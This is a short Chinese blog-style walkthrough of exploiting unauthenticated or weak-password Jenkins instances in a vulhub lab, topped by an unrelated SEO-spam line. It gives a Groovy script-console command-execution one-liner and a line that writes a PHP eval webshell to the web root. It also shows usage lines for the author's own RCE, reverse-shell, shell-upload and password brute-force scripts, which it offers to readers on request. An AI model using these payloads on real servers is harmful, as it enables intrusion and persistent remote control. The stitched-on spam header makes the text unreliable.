十堰 网站建设广州seo网络推广员
一、漏洞简介:
Jenkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。
漏洞原因:jenkins 未设置帐号密码,或者使用了弱帐号密码
二、漏洞复现:
访问:target/manage,如果有未授权的话就直接可以进入如下界面,如果没有,尝试弱口令猜解,我这里用的是vulhub搭建的,账号密码:admin / admin
1、执行命令并回显:
println "id".execute().text
执行结果:
2、上传shell文件
new File("/var/www/shell.php").write('<?php @eval($_POST[cmd]);?>');
由于这里没有其他环境,就演示写到tmp目录下:
shell.php被成功上传
三、自动化EXP(自写):
一、自动化执行命令脚本:
支持三个功能:需要手动修改conf.py配置文件:
1、RCE:
python3 Jenkins_Exec.py http://192.168.136.131:8080 -f rce
2、反弹shell:
python3 Jenkins_Exec.py http://192.168.136.131:8080 -f r_shell
成功反弹shell:
3、上传shell:
python3 Jenkins_Exec.py http://192.168.136.131:8080 -f shell -s shell.php
二、弱口令爆破脚本:
使用实例:
python3 jenkins_burte.py http://192.168.136.131:8080 -u pass.txt -p pass.txt -t 10
脚本已经打包好了,需要的看官后台留言:jenkins exp,链接有效期为7天,请注意保存,请仅用于学习研究!
注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!
注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!
注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!